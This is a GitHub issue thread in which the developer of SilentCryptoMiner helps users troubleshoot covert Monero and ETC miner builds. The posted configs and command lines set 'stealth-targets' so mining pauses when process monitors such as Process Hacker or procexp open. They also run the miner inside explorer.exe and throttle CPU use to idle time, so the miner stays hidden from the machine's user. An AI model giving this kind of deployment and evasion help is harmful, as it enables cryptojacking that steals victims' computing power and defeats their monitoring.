### ISSUE TITLE
No XMR miner since update 2.2.0

### ISSUE THREAD

**Issue by hidden-69** [UnamSanctam/SilentCryptoMiner#532]
Since the latest update my worker in nanopool doesn't show anymore, do any settings need updating?

{
    "algo": "rx/0",
    "pool": "xmr-eu1.nanopool.org",
    "port": 14444,
    "wallet": "`WALLET.{RANDOM}/PASS`",
    "password": "",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 30,
    "idle-wait": 5,
    "idle-cpu": 60,
    "stealth-targets": "",
    "kill-targets": ""
}
{
    "url": "stratum://`WALLET.{RANDOM}/PASS`@etc-eu1.nanopool.org:19999",
    "algo": "etchash",
    "max-gpu": 0,
    "idle-wait": 5,
    "idle-gpu": 60,
    "stealth-targets": "",
    "kill-targets": ""
}

Not run as Administrator, only non-administrator miners can be searched for.
Watchdog Running: No
Miners:
--algo=rx/0 --randomx-no-rdmsr --url=xmr-eu1.nanopool.org:14444 --user=`WALLET.{RANDOM}/PASS` --pass= --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60
--cinit-algo=etchash --pool=stratum://`WALLET.{RANDOM}/PASS`@etc-eu1.nanopool.org:19999  --cinit-max-gpu=0 --cinit-idle-wait=5 --cinit-idle-gpu=60
GPUs:
 Intel(R) HD Graphics 630
 NVIDIA Quadro M1200
Compatible GPU found: True

**Comment by zozidalom** [comment]
I also have the issue, the miner is running, using CPU in task manager, but I don't see any workers in my pool. Did it work in 2.2.1?

**Comment by UnamSanctam** [comment]
Ah right I forgot to update the unamlib (that replaces workers) when I reverted from the EPIC Cash miner build. It will still mine of course but it won't replace {RANDOM}. I'll hotfix it and replace the 2.2.0 build in the meantime before 2.2.1.

**Comment by zozidalom** [comment]
Okay thank you

**Comment by UnamSanctam** [comment]
I have replaced the 2.2.0 release with a fixed one now, if you redownload the builder then XMR variable worker names should be working again.

**Comment by zozidalom** [comment]
I have redownloaded it, I see that it's running and using CPU in the taskmanager, but it still does not show up in my pool (waited around 30minutes with it)

**Comment by UnamSanctam** [comment]
Can you show your settings?

**Comment by zozidalom** [comment]
Sure

![image](https://user-images.githubusercontent.com/24374345/161388926-4a8953ee-9e96-4bf0-9fc5-a48baa631439.png)
![image](https://user-images.githubusercontent.com/24374345/161388952-6abe1bac-3479-47b2-b763-91ed6ac952fa.png)

```
{
    "algo": "rx/0",
    "pool": "de.monero.herominers.com",
    "port": 1111,
    "wallet": "myaddressishere.{RANDOM}",
    "password": "",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 90,
    "stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}
```

```
Not run as Administrator, only non-administrator miners can be searched for.
Watchdog Running: No
Miners:
--algo=rx/0 --randomx-no-rdmsr --url=de.monero.herominers.com:1111 --user=myaddressishere.{RANDOM} --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cuda --opencl --cinit-idle-wait=1 --cinit-idle-cpu=90
GPUs:
 NVIDIA GeForce GTX 1650 Ti
 AMD Radeon(TM) Graphics
Compatible GPU found: True
```

Also, there is no load on the GPU, only the CPU seems to be mining. (But not showing up in the pool)

**Comment by UnamSanctam** [comment]
For Herominers you put the worker name in the password field and not in the wallet address. Also don't mine XMR with the GPU, XMR is a CPU coin and you also can't see the correct GPU usage in the Task Manager anyways

**Comment by hidden-69** [comment]
Don't want to spam you with new issues: why not one remote config file for all the settings including the web admin url? That way you are much more flexible and don't have to rebuild your miner when your webadmin hostname changes, can add new miners, etc.

Can think of scenario's with different rigs that it could be easyer to assign mine settings per coin as well...

**Comment by UnamSanctam** [comment]
Because it wouldn't really work, I can write out all the reasons if you want to but it'll be a lot of words since there are a lot of reasons it wouldn't work. But you can already change the web panel URL using the "Remote Configuration" if that's what you want, you can do `"api-endpoint": "API URL"` I think.

**Comment by hidden-69** [comment]
Ah cool, that would be enough, thanks!

**Comment by zozidalom** [comment]
> For Herominers you put the worker name in the password field and not in the wallet address. Also don't mine XMR with the GPU, XMR is a CPU coin and you also can't see the correct GPU usage in the Task Manager anyways

Okay, thanks, I have done that, but my hash rate in the pool, is still 0, (waited ~25mins again) but there is CPU activity. Also CPU limit seems to be working (idle/not idle). But for some reason, I don't see any workers or hash rate in the pool.

**Comment by UnamSanctam** [comment]
Yeah since it's using CPU that means it's receiving work from the pool successfully, are you sure that you're checking the correct wallet address on herominers? I'm test mining to it right now and I can see my hashrate (after about 10 minutes).

**Comment by hidden-69** [comment]
My worker is still offline after an hour of mining xmr

**Comment by zozidalom** [comment]
Yes, absolutely sure, I double-checked, I used and checked the same address I have in the miner.

**Comment by UnamSanctam** [comment]
Are you able to post your settings? I just created a new miner with a newly downloaded builder with {COMPUTERNAME} and it appears.

**Comment by zozidalom** [comment]
```
{
    "algo": "rx/0",
    "pool": "de.monero.herominers.com",
    "port": 1111,
    "wallet": "mywallettaddress",
    "password": "{RANDOM}",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 90,
    "stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}
```

**Comment by zozidalom** [comment]
U said u also use this pool, how do your settings look like?

**Comment by UnamSanctam** [comment]
I use the same settings as you except with another address, can you try another pool and see if it works there? In case the problem is with the pool.

**Comment by zozidalom** [comment]
Okay I tried with another pool and I had the same results. I use the wallet address given by my vault (Exodus) by clicking the receive button there.

**Comment by UnamSanctam** [comment]
That wallet address should work fine, which pool did you try? Try using nanopool (though finding a share can take a while), I just tried with that as well.

**Comment by zozidalom** [comment]
https://monerohash.com

```
{
    "algo": "rx/0",
    "pool": "monerohash.com",
    "port": 2222,
    "wallet": "mywallettaddress",
    "password": "{RANDOM}",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 90,
    "stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}
```

**Comment by zozidalom** [comment]
I also tried to remove the password field but no success... I have no idea why this is happening, it would be really great to check the logs of the miner.

**Comment by UnamSanctam** [comment]
Looks like something weird is going on with GitHub, it could be that. I'll try to reupload the builder again, changes I've done have been reverted like 3 times now.

**Comment by zozidalom** [comment]
Try uploading a new release by increasing the bugfix version maybe.

**Comment by UnamSanctam** [comment]
I can't create new releases, update one or anything, it doesn't actually do anything when I try. I'll attempt it in a VM instead.

**Comment by zozidalom** [comment]
Okay please let me know about the results :)

**Comment by UnamSanctam** [comment]
Hey can you see a file for 2.2.0 in https://github.com/UnamSanctam/SilentCryptoMiner/releases/ now? If you can try that one. I had to start a VM and use Tor to be able to upload it so it should be fine.

**Comment by hidden-69** [comment]
Miner seems to be coming online, but max% cpu mining is not working, it's like idle max cpu is always used.

**Comment by hidden-69** [comment]
Max CPU seems to be ignored tho, I have it on 30% and 60% IDLE, and it's using more then 40% while I'm not idle..

**Comment by UnamSanctam** [comment]
How many cores do you have?

**Comment by zozidalom** [comment]
> Max CPU seems to be ignored tho, I have it on 30% and 60% IDLE, and it's using more then 40% while I'm not idle..

It started mining for me as well, but I have similar issues with CPU limit

**Comment by UnamSanctam** [comment]
And you've done the math of how much it should be using https://github.com/UnamSanctam/SilentCryptoMiner/wiki/XMR-Miner#max-cpu?

**Comment by zozidalom** [comment]
Yes, and it was working, before the current update which fixed how it appears in the pool. Then after leaving the mouse idle for 2min (my idle time) it increased CPU. Now it does not.

**Comment by UnamSanctam** [comment]
Hmm, it works for me.
<img alt="d75110647a8e17989d56" src="https://user-images.githubusercontent.com/10323655/161578520-f88b5137-2c61-4d96-a38e-dc7c6e170f63.png">
Can you check with Process Hacker like I did? You double click the miner process (by default explorer.exe) and press the "Performance" tab for a graph.

**Comment by hidden-69** [comment]
It starts oke, but after a while it just runs up and idle is ignored. Can't get more into it right now, bit too busy.

**Comment by hidden-69** [comment]
Allright, it doesn't go out of idle mode when I use the mouse (trackpad on laptop), it seems to work with a normal mouse tho. As soon as I use the keyboard it jumps out of idle mode as well.

I thought I had this while working with keyboad as well, but can't reproduce, I'll keep testing.

![image](https://user-images.githubusercontent.com/102571076/161785354-198ee16c-caef-48bd-be4c-a872339c4f7e.png)

**Comment by UnamSanctam** [comment]
Yeah the trackpad might not trigger the activity counter in Windows.

**Comment by hidden-69** [comment]
That seems to be it, was working without using my keyboard for a while with low idle time.

I have ETC 0% & 60% Idle, is that supposed to work? Could also be that my laptop GPU is just not good for testing..

**Comment by UnamSanctam** [comment]
Yes with 0% it will pause while it's active and then use 60% while idle.
